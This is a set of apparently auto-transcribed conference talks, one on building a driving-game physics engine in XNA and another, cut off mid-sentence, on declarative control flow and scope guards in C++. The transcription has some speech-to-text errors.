angle of the actual wheels are. And then if we apply some throttle to that, you can see I've got some basic telemetry data that I use for debugging coming out on the bottom of the screen. We can give the car some velocity and then I can start doing some turns. The wheels actually, I colored it so the wheels will actually turn red when the car starts sliding. So you can see at slow speeds that we can turn okay. However, as the car increases, if we try to make too much of a sharp turn, it basically slides and it slides out like that. And what I was focusing on this was, you know, looking and trying and getting some fairly realistic variables in the way we actually define the car. So what I'd done here was, you know, I thought about all of the actual dimensions of the car. So we've got a bunch of constants. These are going to be stuff that does not change. Now, if you're building different car models in the game, you'd be basically swapping out those constants. So you'd have different mass, different acceleration, different engine power, different wheelbase, maybe different friction coefficients if you're doing that sort of thing. And if you're playing forza, you know, you can go in and customize your car, which will affect lots of stuff in the actual physics engine, affect these constants. I've got the driver input, which is steering angle, throttle, base, brakes, percent. I've also got Kersen DRS, which if you're a Formula One fan, you'll probably know what that means. And I'll talk about that stuff a bit later on. Then I've got the variables, the position, which is going to be a point. Then I've got the direction downforce. And I'm using 2D vectors here for velocities and things like that. Now, when I was playing around with this stuff, you guys kind of make taking a mix between, okay, let's do the physical simulation. But really, the main thing is how does this feel? That when I do that, does this feel like the car is sliding around a corner? Does it feel like it's sliding correctly? And I have been playing around with these variables a lot, so it may not be simulated as it should. But I was really really focusing on the feel. Now, a couple of things I am simulating as well here is the actual downforce. If we use the drag reduction system, that will basically reduce the actual downforce on the car, make the car go faster. But it also means that the actual downforce will be a lot less, reduces drag and reduces downforce, which means that you are going to be sliding off around the corners a lot more. So I was really just doing the simulations to see how that worked. And when I was kind of happy with that, I moved on to the 3D world and started thinking about actually getting it implemented in the game. So the 3D gaming, we are going to be going back to school and working with vectors and matrices. However, instead of the 2D vectors, we are going to be looking at a lot of 3D vectors. And this is the same if you are using XNA and if you are using the Unity. They both have this vector class with these three points. You also have 2D vectors and 4D vectors as well for other things that you are going to be working with in the game. So this is fairly simple. You got a point, it is going to be this on the XYZ axis and that is going to basically project out to a vector like this. Nothing too complex about that. And then there is how vectors are used. Vectors are used a lot in XNA for different things. Now you could argue that a position is a point. Well, a point is just really a data structure that contains an X, Y and a Z coordinate. So they basically use the vector as an actual point as well. And you can think of it as maybe a vector, it is kind of the distance that you are from 0, 0, 0 in the actual game world. So it can be used for the actual position out of the car. All of the actual items will have a position in the 3D game world. Then you have got the direction. Where is the car facing? Which direction is it pointing in? You also use the 3D vectors for those. These are basically often known as normalized vectors. So the length of the vector will always be 1. But it is X, Y and Z value will sort of determine which direction that one unit of vector is pointing in. It is like velocity. The speed and the direction, which is very important. The speed and direction of travel is also a vector. And then you have got the acceleration. The changing velocity is also another vector. And all of the forces on the car, like gravity, they are also going to be vectors as well. So what we are doing really in the actual game is doing these calculations. We have got the weight of the car, we have got the engine force, we have got the road friction, we have got the aerodynamic drag and we have got the downforce. And what we are really doing is taking these vectors and doing this calculation to actually just add them together. And that actual resultant force that we are going to get is going to be the force that is supplied on the car. And then force is equal to mass times acceleration so we can calculate the acceleration on the car. So this is an actual snippet from the game code where I am using the vector 3 class and saying, well, the force is going to be gravity multiplied by mass plus the engine force plus the friction plus the drag plus the downforce. And that is going to tell us what is happening to the car. This all did not go according to plan. Some things did go wrong. One of the classic things, which was getting downforce the wrong way round, I forgot to use a minus sign for the actual downforce. So downforce was upforce. So I went really, really fast and then went off a jump and the car had basically upforce on it. And it just basically took off like a plane and flew off. And then eventually the wind resistance, you know, brought it down to the ground. But, you know, you can just change a few things around and you are building a flight simulator rather than a driving simulator once you have got those calculations. A couple of things that are useful with vectors that you may remember from school or you may have forgotten is cross product. So this is basically taking the direction and the up angle of an object and being able to figure out, you know, whereabouts the right position is for this. So if your car is going forwards and you know which direction is up for the car, you can actually figure out, you know, which direction the centrifugal force will be acting on the car by using the cross product. And that is used quite a lot in the game. The right direction of the car is equal to vector 3 dot cross passing in the actual, you know, direction we are traveling in under the vector. And a lot of calculations that use that. Dot product is used for taking a couple of vectors and calculating the kind of, you know, the proportion of one vector that is acting in the direction of the other vector. So here we are interested in, you know, the actual force of the car on the actual track. So that is going to be the mass multiplied by the dot product of the gravity and down. And as the down vector of the car and as the, you know, the slope gets steeper, the actual force of the car on the actual slope is going to be less and the wheels are going to start slipping. So the homebrew physics engine that I have built and again this is something that I wanted to build myself rather than looking at how the actual physics engines worked. This is what I did. I basically calculated based on, you know, the force acceleration where the car wanted to be at the actual next frame. This type of calculation is fairly straightforward. The car is going off a cliff. It's going to be travelling at a certain speed. The next frame position based on all of my calculations is going to be putting the car there. And that's no problem. It's going to be there. However, if we're going along a straight road, the car wants to be there. However, it's not going to be there because the road is within, is, you know, blocking it from falling there. The car is actually going to be there. So what I did then is calculated, well, you know, actually the car is going to be there. This is the difference between where the car wants to be and where the car is going to be. And that difference we can, you know, treat as an acceleration. We can basically say the force acting on the car is going to be proportional to the length of that line. And that would allow me to calculate the downforce on the actual, at the actual track because downforce and gravity are pushing it down and we're going to reposition the car and then calculate the actual force and that's going to give us the actual downforce, the force on the tires. And that's how I'm calculating downforce. So if the, we've got a track section that looks like this, the car wants to be here. However, it's going to be here and the actual force is going to be greater. And I put looking at the telemetry data, when the car goes at full speed around one of the loops in the game, I think there's 44G that's being placed on the actual, the actual car, massive gravitational force there. And again, it's back to, you know, SIM versus the real world. Do you really want to model what would happen if you drove a real car around a loop and got 44G on it? It would break. And you do, do you want that to happen in the game? Or do you just, you just, you just want to make a game that's, that's fun to play? So thinking, thinking about things, things like that as well. And then if you're going sort of over a crest of a hill, then the car wants to be here and you've got this, you know, sort of very little force on here. So certain sections of the game, if you're going over, over the top of a hill and you attempt to make a corner, the car's just going to slide because there's no sort of real force between, or very small force between the car and the track. And it's going to take a low bit of centrifugal force to actually make it, make the car, the car slide around. So after I don't, you know, played around in the 2D world, what I did was, you know, went into the 3D world and kind of I was really inspired by what they'd done in that next car game demo. And I kind of says, okay, well, let's, you know, do the same thing where I've got this kind of test track like I had in the 2D world. And again, focus on the actual feel of how the car is, is, is going to feel when driving. I spent quite a lot of time watching this, which was a clip from BBC's Top Gear presentation. Again, apologies for the, the advert there. Well, they took sort of 3 high performance cars and they went out to a beach in Wales and just spent a lot of time driving them round and round in circles in the sand. And I kind of thought the, the actual, you know, feel and the look of the way that, that car looks as it's sliding, sliding around these corners. It kind of, you know, it would be fun to have a driving game that did that. So that's kind of one of the things that I was kind of looking at as I was focusing on the actual, you know, game engine that I was working on. So going into the actual game engine itself, this is basically, I got a flag here called skid pad, which I can set to true. And if skid pad is set to true, it doesn't render the track, it just basically renders this, this square and we actually got the car driving, driving around on that, that actual, that actual test track. So it looks something like this if I just go in and go to the, the actual track. And, you know, kind of what I wanted to simulate, I have actually, you know, hard coded in. So we leave tire tracks even when we're not skidding. And this is just so I could see where the car has driven. So the wheels aren't skidding there, it's just leaving tire tracks like it would do in the sand. And then I was saying, well, you know, here's the car actually sliding around, you can see that it's like, you know, doing a corner slide here. And then I can, you know, use brakes, use acceleration and basically simulate, simulate, you know, how the car drives. And I kind of wanted to get happy with that kind of model before I started you know, focusing on and getting the car to actually run on the track with all of the, the collision detection and stuff like that. So I spent quite a bit of time, you know, trying to get the numbers right so it would actually feel, you know, a bit like a car sliding around a track. Now I'm making a really simple assumptions here. If you're thinking about going into doing, you know, more serious simulations, there's a magic formula which I'm not going to attempt to pronounce, but this is basically what a lot of the racing games use. It's a certain formula that somebody's come out with to basically calculate what's called a tire friction curve, which is basically simulating for each of the four wheels on the car how the actual tire is going to slip based on various inputs that we put into the formula. So it generates curves, curves like these. And you can see the actual code for the, the actual formula is very complex. There are also, you know, C sharp implementations of this actual formula here if you want to plug them in. So it's, yeah, has the projector gone altogether. But that magic formula as they call it will basically give you something like this based on the actual, the actual force. That's, you know, what you can do. But I really didn't want to, you know, copy paste that big chunk of code in and I kind of wanted to, you know, stick to, stick to something a bit more basic for the actual, the physics simulations. So what I can do now is basically set the skid pad equal to false. And what that's going to do is to drop the game back into the regular game mode. And this should hopefully give us the actual physics engine working in the actual, in the actual game itself. So if I go to play and I'll actually go on the Azure car and I'll go on to the, the actual middle track here. And I could be going to switch out to the actual Xbox controller and use that. The X and A driving game does support the, the Xbox inputs there. So I do have my curves and my DRS. I'll talk about that a bit later on. So the curves allows me to accelerate. The DRS also reduces my friction here. So you should hopefully see the jump physics coming into the game. And I kind of wanted to make it so you could jump through the loops on the other tracks and, and land like that. Also if I attempt to drive at full speed around a corner, I'm going to slide off and I'm going to crash. And I kind of wanted to build in that type of, you know, physics. You can see that there's a couple of glitches in here, especially when you hit the barriers. But even when you're just driving in a straight line, I'm still, still trying to iron out. And I'm figuring out that this is probably related to the, the floating point calculations that we're doing in the actual, the actual game. So I'm going to try and figure out how to actually iron, iron those out and get the game running a bit more and more playable. Well, and there's certain sections in the game where you will actually fly off the track. If you're, if you're basically driving and you hit a jump, there's so many sections where, where the car will actually leave the track. And I've kind of designed the, the actual track layouts to make it so there are, there are these sections in just to make it, make it a bit, a bit challenging. Incidentally, if you're playing around with a game, one thing I really liked about this game was the way that the actual track design worked. The track designs are basically, so for one of the tracks, you've got about sort of 15 points in 3D space and it calculates a 3D spline and then basically creates the actual track from that 3D spline. It puts in all of the barriers, it puts in all of the lights, puts in warning signs when you've got, got corners and stuff. So you don't have to, you know, design the track completely. You can just, you know, change the points in 3D space, raise a point by 10 meters and it will draw the entire track going out, going over that jump. So it makes it really easy to do the actual track mods in the game. And I've done, you know, spent quite a lot of time at modding out, modding those tracks. So onto the Curson DRS. One of the things I'm doing with this game is storing out the telemetry data. So I think I can show you this on, I don't have too much data in the actual website, but on the website itself, if I go to the Red Dog Racing website, we should be able to go into the actual lab data for Alan and see the actual labs I've driven and select one of the actual labs here that I've completed here. And when you actually select the lab, it's going to show us the actual telemetry data for that lab. So this is being sampled by the driving game, sampling this 10 times a second, sending messages at once a second to the service bus. This is the same thing we do in Formula One. They talk a lot about telemetry data and comparing telemetry data and various things like that. They process gigabytes of this stuff every weekend, you know, after the actual races that they've done. So this is the speed and the actual damage. You can see every time I crash, the damages increased on the car and the speed will decrease. Here's the actual driver input, showing the steering, the brakes, and the throttles and so on. Now, this is a simplified telemetry, the physics engine that I'm working on. I've included the kinetic energy recovery system, which is kind of like a battery system that they have in Formula One. So when you accelerate, you can press the curse button and that gives you extra horsepower, your car accelerates more. When you come into the corner, it's kind of like a Honda Prius. If you use the brakes, it uses generative braking to charge up the battery. So you'll get the battery charged up. You can go around the corner and then accelerate out of the curve. I did that for a couple of reasons. Firstly, a lot of people playing driving games don't use the brakes, which is a really bad idea because the lap time is really set by effective braking. So it encourages people to brake. Also, it puts a bit of strategy into the game. When do you use curves? When is the best place to actually deploy the curse to accelerate the car? And comparing the telemetry data between two different laps is going to allow you to analyze that as well. I also put the DRS in as well because they've got that on Formula One. That was to make the cars go faster, reduce the aerodynamical drag and also reduce the downforce. So I've basically put those in the game. And you can see that when I was actually playing the game, those two actual forces. And I'll basically show you how that works. So the curse system has this battery you can use to accelerate, as I mentioned. And then when you brake, it's going to charge up. And we see that graphic on the screen. DRS system, on a Formula One car, I've done this really cheesy diagram here. But basically what happens is it's got this flap that does this. And it changes the downforce and the aerodynamical drag. It's quite a small effect in Formula One. I think they get something like 17 kilometers an hour of extra speed. So I've really exaggerated the speed effect that you will get in the game based on using the actual system like that. So I've talked a lot about downforce. One of the things that's always astounded me about the Formula One physics is that the downforce on a Formula One car traveling at full speed can be as much as a force. I mean, forces are measured in newtons. But the force is equivalent to about 2,500 kilograms. The Formula One car, I think the minimum weight is something like 750 kilograms. They may be typically way around 800 kilograms when they've got a bit of fuel in them and the driver. So that's going to mean that the actual downforce on the actual car is far, far more than the actual weight of the car. So that's going to be really what's keeping the car on the track as we go around the corner. Theoretically, a Formula One car could drive upside down on the roof because there's so much downforce above a certain speed. It never happens in real life. But when they go to the Belgium Grand Prix, when they're driving up a corner called Aruge, when they go out the top of that corner, there's actually a negative 1G on the actual driver. So if it wasn't for the downforce, the car would fly off the track. If the driver wasn't strapped in, the driver would fly out of the car as he actually went around that corner because there's so much downforce pushing it down. So it must feel incredible for the actual driver driving out of the car. It really blows my mind how they can do this. When you think about the size of a wing on an aeroplane that requires it to take off, and then you look at the size on the wings of that car that's producing 2,500 kilograms equivalent force down on the car with these tiny wings, they're really trying to make this as effective as possible. So we can't do this in real life. We can't drive Formula One cars upside down. However, in the simulation, I did add the code so that we can turn the game world upside down. I just kind of wanted to do this to actually test if the car would stay on the actual track because of the actual downforce. One of the things I'm going to do is with the track mods is I'm going to mod the track so there will be a section of track that goes upside down. So you have to drive at a certain speed on that section of track if you're going to actually stay on the track. So what I should be able to do is to go in and start the game. And I'm going to select the beginner track here. And a couple of other controls that I've put on the Xbox is on these buttons. I can actually do that with a game world and move it around here. So let's just see if I can get up to the appropriate speed. There is a fairly straight section of track where I should be able to rotate the game world and just see if we've got enough downforce to stay upside down. So let's give it a big boost on the actual DRS and then just see if we can do this. So we are driving upside down now and if I do crash or if I do break, eventually we're going to fall off the game world and it is going to actually do that. I'm going to turn the game world upside down and get back onto the track again. So I would really like to put in that section of track. I mean I've not seen it done in a driving game where you can use downforce to drive upside down but it must be quite a fun thing to get to make that stuff happen because it would actually happen according to the laws of physics if not according to the laws of the road. So finally one of the things I kind of interest me is the sound of top gear and the crazy stuff they do with cars. Did anybody see this episode? They had like a Porsche and a VW Beetle and they did a drag race between the Porsche and the Beetle. Now obviously the Porsche is going to win the drag race. So what they decided to do to make things a little more fair was to actually take the VW Beetle one mile above the desert by helicopter and then drop the Beetle and see if the actual Porsche could complete the one mile section before the actual Beetle managed to land on the ground. And there is a clip of YouTube basically showing that happens. So if we go on to... Yeah, I did bookmark it here. So this was Richard Hammond with the actual cars and then he starts talking about physics and how all the physics means. And again this is all this stuff about terminal velocity, the speed of the Beetle and what the acceleration of the Porsche is going to be and if it is theoretically possible for this to happen. And then they go and test it for real world. I kind of am a bit concerned that he is wearing a crash helmet. It is not really going to be that much protection if the car lands on his head. But basically they went through and they did this at this test. And I kind of thought well how can we make this happen in the game world? So what I did and I can switch back to the workshop version of the game was I decided to make that. I actually did this this morning in the hotel room. So I have basically built this top gear test car which is an actual class. And I really wanted to show a bit about how that Euler calculation works because in the actual game model itself there are so many different variables going on. It is kind of a challenge to actually show that code on the screen. But this is a bit more basic. It is just a falling object that we are going to be at simulating. So again I am starting off with my constants. We have got an actual friction coefficient. We have got the mass of the car. We have got the gravity, you know, 9.8 meters per second. We have got the upward direction and the forward direction. We have got the position where the car is going to land. We have got the height in meters where we are going to drop the car from. And we have got the actual track sector in the game world where the car is going to hit the track. And that is basically used to calculate when the car hits the track and we before or after that particular track sector. That is going to decide if we have actually passed the top gear challenge or not. Variables. We have got position, velocity and then sort of whether the challenge is complete. And what I am doing really is basically, you know, when we create a new instance we basically put the car at the full position plus the height. And again these are vector 3 calculations I am using. So I am figuring out where the car is going to be when it starts off. The velocity is going to be 0 and challenge complete is going to be false. So this happens when we start a lap. And then we have got the actual Euler physics method here, the update method. And again this is kind of, you know, what I was talking about on the slides where we are going to be getting the frame time. And the frame time is going to be in fractions of a second. So the first thing that we do is we calculate the aerodynamical drag force on the car. And remember that is equal to the velocity squared multiplied by the drag coefficient. Now because these are vectors, the drag force is going to be a negative force, it is going to be slowing things down. So I take minus velocity now, this is a vector quantity. Now because we are squaring it we multiply it by the scalar quantity which is the length of the velocity vector. And then multiply it by the actual friction coefficient. So that is the drag force, the aerodynamical drag force. We then figure out the gravity which is equal to mg mass times the gravitational coefficient there. And then we can actually figure out the resultant force on the car which is this vector 3 here. Exhilaration force is equal to mass times acceleration. So again this is school kid physics, we work out the acceleration. We then work out the velocity by multiplying, by adding the acceleration to the velocity and then taking into account the frame time. So the acceleration, the change in velocity is going to be a lot smaller as the frame time gets smaller. So that is going to make mean it is going to fall at the same speed if the frame-frame varies. We do the same thing with position, we recalculate the actual position there. Okay so let's just see if this is going to work. What this should hopefully simulate is that same challenge that we had on top gear here. I am going to see if I can do this because it was quite a challenge to actually get this working. So let's go into the options and going to drop this. I am going to take off post-screen effects because that does all of this like lens blur and stuff with the sun reflecting off objects which kind of means that it is kind of challenging to actually see the falling car. But I am going to go and select the Windows Azor car and then select this track here. Now what you should see is a small dot in the top of the screen which is the actual car that is falling and that car will gradually fall down to earth as I am actually driving around the game. If I don't crash I did actually crash there so maybe I am not going to actually make the challenge this time. You can see that the car is getting a bit closer to the earth and it is looking like I am not going to make it this time. So the actual challenge failed because I actually had hit the track before I got to that section of the track. So let's just see if I can do that again and actually make this happen and succeed. It is the last session and we could be here a long time if I don't manage to nail it this time. But I will concentrate a bit more and I will try and stop talking as I do this. So this is looking better. I am going to do that one more time. Sorry about that. This is looking better. Yeah I think I managed to do that. Yeah. Thanks for that. So yeah I kind of think there is an opportunity there. I kind of like those top gear challenges. Does anybody do a driving game where the driving game is based on doing top gear challenges? I think that would be good fun to do to have all this crazy stuff in there. It is a good marketing opportunity there. So just rounding off the session I have talked a lot about kind of my hobby project with physics and playing around with stuff like that. Game development is great. It is really, really creative. It is great fun to work with. There are marketing opportunities to be made there. However the people I have talked to who have been involved in the games industry have said it is a lot of hard work. There is maybe not that much money unless you are doing it. It is just out of interest. Is anybody working in game development? Solid game development here. So basically I kind of think it is a hobby project. So it is good stuff to play around with. I think it is a good way. I do a lot of training. One of the things I was thinking of doing is going to schools, universities and talking about physics and games and how this stuff relates. It is good fun to play around with. It is pretty addictive. So you can spend an unhealthy amount of time actually focusing and playing around and trying to get this stuff to work. It is great fun and a way of being able to build up your coding skills. So I do have a few more resources if you are interested in looking a bit more into the actual game programming, game development and that type of thing. First of all the plural side that I did. Now this kind of is not really related to the game development itself. It is more related to how we can integrate a game with cloud services like Windows Azure. So there I talk about using blob storage for the ghost cars, table storage for the actual lap time data and telemetry data and how I can basically queue the telemetry data and get that into the cloud for processing. I kind of think that telemetry and the internet of things is going to be the next big thing. There is going to be a lot of scenarios where I think what you can do with telemetry data and the Raspberry Pi and a fleet of taxis being able to actually push telemetry data into a cloud based service using some kind of a connected device. Coffee machines, heating systems are going to be automated. People are doing hobby projects to do home automation, working with cloud services. It is the same techniques as you are using in the game and I am talking about there as the actual telemetry processing. This guy, Gary Simmons, it is gameinstitute.com. He has done a course on how to build a racing game in unity. If you subscribe to that site and it is currently I think 49.95 to actually get a year subscription to that gaming institute which is a really good price, you actually get the source code for that game and the quality of the videos that he has done are incredible. He is talking about how the driver AI works, how the physics works. He is based on the physics engine so he is using all of the unity wheel colliders and all that type of stuff. I think I record my own courses and I was really impressed by the way that he goes out with a film crew to a motor museum and does a lot of talking about the actual theory behind working with the game. There is some really good stuff there. You also get if you want to work more with unity than XNA, the actual unity source code to that racing game that you can customize and experiment with and change as you want to. Thanks very much for listening. My name is Alan Smith. I am going to be around for a bit. I have got to run off and catch my flight so unfortunately I won't be around this evening but if you do have any questions about Windows Azure, about games, about XNA, physics or Formula One, I will be hanging around for a few minutes. Thanks very much. Enjoy the evening and the rest of the conference.
This entertaining and demo intensive session will lift thelid on the black art of physics simulation in computer games. The samplescenario will be the re-writing and testing of the physics engine in a sample3D driving game. Starting with the basics of force, mass and acceleration thesimulation will be gradually enhanced to include lateral and vertical g-force,tire slip, down-force and collision detection. The addition of a drag reductionsystem (DRS) and kinetic energy recovery system (KERS) will round off the demo,and add a strategic element to the game. The techniques demonstrated can easily be applied to 2D and3D games on any technology to improve the responsiveness, feel and overallplayability of the game. The trade-off between the purity of the simulation andthe all-out fun of arcade style games will be discussed and demonstrated, alongwith plenty of tips for developing, testing and fine-tuning the physics model. Whether you are learning to develop 3D games in Unity,MonoGame or another technology, interested in learning more about what makesgaming physics simulations tick, or just want to kick back and see how much funyou can have with C#, this session will have something for you. You will alsohave the chance to install and play the game, test the physics implementationfor real time and compete with other attendees for the best lap time!
10.5446/50577 (DOI)
Hi everybody. I hope you've had a great lunch. My name is Andre Alexanderescu and I'm going to talk about declarative control flow, which is some sort of combination of words that make surprising sense given the circumstances. I'm going to explain what I mean. The title as on your programs, which was what? Error handling in C++ was an unfortunate small error. This is I think quite a bit more interesting and for the people who've been in my workshop just the day before, this is going to nicely add to it. By the way, who has been in the workshop of you? All right, great. I'm glad you're here. But those who didn't raise their hand, don't worry. There's enough context for anyone to pick this up. Okay. I should say that's 46 slides that we're looking at, which then I have a thing. It's two minutes per slide. I can't do better than that. So we got to hurry quite a bit, right? All right. So I'm going to talk about what motivates the whole approach to declarative control flow. They're going to discuss some implementation and finally some use cases that make this the whole thing interesting. This was in the workshop as well. I'm discussing a very common pattern of writing programs, which starts with I'm doing something that has a cleanup associated with it, which is opening and closing files, et cetera. After the cleanup, there comes whatever is next in the plan. And the interesting thing is if the next thing on the plan fails, we need to roll back, which is sort of a typical sort of transaction database-y kind of thing to do or say. But it appears a lot of more programs than just databases. So, well, this simple pattern goes implemented. We're going to look at its implementation in a few typical languages and I'm going to expand a bit on what I discussed during the workshop. So, well, in C we go, we can assume that the action is going to return some Boolean telling us that it worked. So if the action works and if next also works, we're just going to do the cleanup. But if action works but next didn't work, I'm going to roll back the action. I'm going to take it back and say, well, I'm going to not only clean up but also roll things back that I've done. By the way, there's a gentleman who has a, there are very many people who have an airplane to catch, right? So if somebody leaves, you should know there's the airplane to catch. They're not leaving in protest or sheer bored them, right? Yeah, never, okay. Excellent. So now here's the thing. Once you have this pattern in C, the problem is going to occur when this is going to be more of the same occurring, which we're going to see soon. But for now, let's focus on this simple pattern. Well, in C++, if you want to be politically correct, we're going to go with resource acquisition initialization and we're going to associate the action and the cleanup with an object, right? And it goes like the, you know, this is like pretty much any book on C++ since 1984. The problem, however, is that the whole rollback business is a bit more complicated. You need to, well, let me create an object that's going to take care of the action and the cleanup, which is nice. But what's not so nice is that if I'm trying to do whatever comes after the action, I'm going to have to try and catch statement to roll back the code by hand. And then I'm going to re-throw whatever exception I got and there I go my merry way. So it kind of becomes more complicated because of all this pesky rollback kind of thing. Well, in Java and C sharp, there's no way but to use try finally. And if the action fails, I'm just going to do the rollback and by the semantics of these languages, I'm also going to fall through to the finally, so I'm going to do the rollback and the cleanup. Who, he knows one of these languages, like C sharp or Java? Okay. So, you know, there's no secret here, no real interesting stuff. In Go, we have the first statement that actually allows you to insert cleanup. However, cleanup is going to be at the end of the current function. It's not going to be at the end of the scope, which makes it kind of a fail when it comes to composition. Now, let's talk about the, you know, speaking of composition. This is the elephant in the room. This is a photo I really like because it represents the elephant in the room. However, the elephant is patterned in the same, you know, kind of like a wallpaper. So it's kind of difficult to really see. So it's kind of an elephant, but at the same time, it's a bit subtle. Kind of, oh, you don't see it immediately. So, well, when it comes to composition, so you have to do like two things, each with its own cleanup and each with its own rollback and all that jazz. I've seen people already, oh my God, okay. What's going on here? So, well, first of all, I'm going to have a very long if statement, which I'm sure you recognize from code that you didn't write, but you need to read, right? I'm sure you didn't write. Oh, okay. I have a video with me falling off a stage, I should say. And the first thing was I raised my hand and said, I'm all right. You know, I didn't die. Okay. Well, if the first action doesn't succeed, we're kind of done here. If it does succeed and the second action also succeeds, we're going to try to do whatever follows after the first, the second action. Essentially, here in this code section, I'm expanding by hand what we had in the first thing by expanding the next thing. So, we have action one works, action two works, but what follows doesn't work anymore. So, I need to rollback both and I need to be careful to rollback with them in opposite order. So, rollback two and one, right? I'm rolling back things nicely in a stack-wise manner. And then it's time to clean up action two because it was right here. And if action one succeeds, action two failed, I'm going to rollback action one and at the end of action one, I'm going to clean up action one. So, this is, you know, it's kind of, I'm sort of losing my ability to explain or it, because it's kind of a complicated pattern. If you have three or more of these, it becomes very complicated. Who knows of a CEDM that takes care of all the stuff? People who were not in the workshop should answer this. So, what pattern do you know in the C program language that takes care of functions that can fail in multiple places and need to do clean up and rollback and stuff? Go to clean up. I'm going to say it, okay? Let's go to clean up. As I said in the workshop, I've been working with companies that had a coding standard these allowing all users of Go to except for Go to clean up because Go to clean up is okay because otherwise you need to put up with this kind of stuff. Go to clean up because, like, you know, you have stuff in your code and if anything bad happens, you have a few clean up labels that are going to roll back whatever, you know, whatever is happening in case you had the issues. And, you know, this Go to pattern has been made famous by recently by what? By the Apple bug. All right. So, the news hasn't faded already. It's been just a couple of weeks. So, you know, the famous bug that had, I think, Go to error, what was it? Go to fail. Actually, Go to fail is the better idiom name because it's kind of ironic, you know. So, anyhow, so, you know, it became unpleasant enough that people allowed the use of Go to for such patterns of, there you go, just kind of underlines what I was saying. And we have Go to down, Go to our own several labels, several rollback actions, several clean up actions and it's all a tolerated idiom because people would have a lot of difficulty coding otherwise. In C++, we're having two classes that compose things and it gets more complicated if any or both of them have rollback code. If you have clean up, that's fine because the destructor takes care of it. But if you have rollback to do, then you're going to have to resort to all of these, you know, placing the main line code into these weird code structures. Now, same deal in Java and C sharp, code gets complicated. Same deal in Go, the code gets complicated. So, my conclusion after analyzing such pieces of code is that whenever you have explicit control flow, it's a problem. And especially when you have control flow with kind of going three ways. One is the clean up, the case of success. The other being the rollback in case of failure. Whenever you have these complicated control flow structures, there's going to be like all of this explicit taking care of it is going to be difficult. So now, here's what we're going to do. And here's where kind of we're going to sort of look into a sort of a different way of doing things which I find from experience is a lot better. We're going to take a book from a different domain, subdomain of programming, of computer science, which is declarative style, declarative programming. The way it works is declarative programming generally focuses on stating neither the accomplishments. So I want to do this and I want to do that. I want to do the other. And, you know, that's what you write. You don't write exactly how things are done. So it's the polar opposite of describing how things are being done. And that's kind of a nice high level thing to remember. The, you know, imperative program is I want to do this and that and the other. And declarative programming is I want this to be accomplished and you take care of the rest. And there are a number of famous languages that build on this declarative programming approach. Because of that control flow is minimally, is minimal and for most part absent because it's the language or the framework that the fabric underlying the language that takes care of the flow. Execution is going to be implicit as opposed to explicit. And actually there's a lot more examples than you may think of. It's not only prologue because prologue, whenever anybody talks about declarative programming, they say, oh, prologue. That's it. Actually there's a lot of stuff, some of which you may be using on a daily basis. Sequel, you declare what needs to be accomplished and the entire optimization and execution aspect and scheduler and asynchrony, all of them are implicit. At Facebook, just as an anecdote, I've been working on a system that does some machine learning, implements a graph based machine learning algorithm and I had two versions of it. One was a 5,000 lines program written in C++ and the second was a 20 line SQL program. And they did the same thing. Granted, the SQL program was slower. So it did things a lot slower but it was a lot easier to understand for people who might show the thing to. And it was a lot easier to experiment with the kind of think of ways of improving it. So the compression ratio of SQL is pretty astonishing if it happens to fit the domain problem pretty well. So Regex, you know, it's for better or worse, is kind of a declarative system. Make, the make file specification, you state goals and actions, you don't state how things should be followed. The engine of the make is going to create a graph and take care of all dependencies and how to execute everything. A variety of configuration programs and systems do things the same way. So, okay, let's take a page from the declarative programming domain and see how we can apply that to this whole control flow. Just to wrap this up, according to a famous Seinfeld bit, declarative is you have the airplane ticket and says, you know, I'm flying from Oslo to Copenhagen and the imperative would be like, you know, all the levers and buttons and actions that the pilot is going to go through to make that done. All right. Well, as an example, destructors which have been like very successful in C++, you can think of them as some sort of a declarative thing because they're invoked automatically. They're automatic and they're everywhere. So, well, it states, you know, construction destruction states neither accomplishment, you know, whenever you build this guy, you do that, whenever this guy is gone, you do that. And that's pretty much it. Execution is implicit. Did you ever write a destructor call? Yes. There should be hands. Yes, okay, there are hands. Okay. So, you know, you may, sometimes you may write a destructor call, but it's exceedingly rare compared to the frequency with which they are just invoked implicitly. Control flow is simplified by destructors a lot. So, you know, we can think of a var.ai as some sort of declarative programming in disguise kind of thing. Which is nice. As I said in the workshop, there's an artifact called scope guard. If you Google for it, you're going to find it. It's going to be in the first, like, five results. It's an article I wrote back in the 2000s. And, you know, as I like to joke, because I ask people, like, did you hear about it? And nobody heard about it. But let me say it's very popular outside Norway. Let me kind of clarify that. So, this is, it's been a long and longstanding idiom in which you specify for each action, you specify which action is going to undo it and then such. I'm not going to insist a lot on scope guard except for the scope exit pseudo statement. Scope exit is going to allow you to specify a code that's going to be executed automatically, keyword, automatically whenever the current scope is exited, right? Which is really nice. Just to kind of recap a little code from the workshop, the way it works is scope exit introduces a complicated macro that, let me see how much, okay. It's going to introduce a complicated macro that in turn, the macro is going to introduce an anonymous variable that starts with scope exit state. And as I'm going to show in a minute, it has a suffix that's numeric and unique. And it's, it constructs a sort of a scaffolding object plus, and who recognizes this among people who are new to this? What is that? I'm not going to continue until we get the answer. So, we have an, you know, an emperor, Nico just talked about this, right? It's at the beginning of a lambda, right? It's sort of what follows here should be the opening curly brace. So, this is sort of the beginning of a lambda and because it's a macro, people are going to, this is going to be generated by the macro and people are going to have to just write the code to it. The example I gave also during the workshop is scope exit. We're going to close the file and delete the file. And notice that as the code flows down, I can plant one or more actions with scope exit and they're going to be nicely in a stack manner executed when the scope is done. So, I create a file and then on scope exit, I'm just going to close it and delete it. And then I'm going to allocate some memory, for example, and when the scope is done, I'm going to free it and then I'm going to go about my business no problem. The nice thing here is that the flow is automated. I don't need to write ifs and tries and things, right? It just flows, right? So, this is a recap of sort of the workshop because I do have new stuff for you. So, don't despair. Then it's like, oh my God, I'm in the wrong talk here. What's going on? Okay. So, as I wrote during the workshop and actually the first time at C++ NBN 2012, I wanted to also have a scope fail to the statement which says if the current scope is executed not in a normal way but by means of an exception, in that case, I want to execute a different piece of code which is going to do my rollback, right? Because we have the, you know, we have the action, we have the cleanup but we have the rollback and this is sort of the missing piece in the Troika that we discussed in the opening. So, all right. Well, here we're kind of turn a new page in the history of computing. Actually, it's possible to implement scope fail today on all major compilers. It's not portable C++ yet but Herb Sutter is working on integrating it within the next iteration of the standard. I don't think it's going to be right for 2014 but it will be right for 2017. So, those of you who are younger than me could rejoice. Now, for completeness, we would like to have also a scope success kind of thing which would complete a three-legged stool. So, you have scope exit, executors code when the current scope is executed. However, the second would be executors code if the current scope is executed via an exception so something bad happened and the third would be logical, you know, would be a complement. Executors code only if the current scope is executed normally, right? So, we'd have a reason to celebrate and say, oh, okay. So, if the current scope is did it, then we can write it was all okay. So, I have this 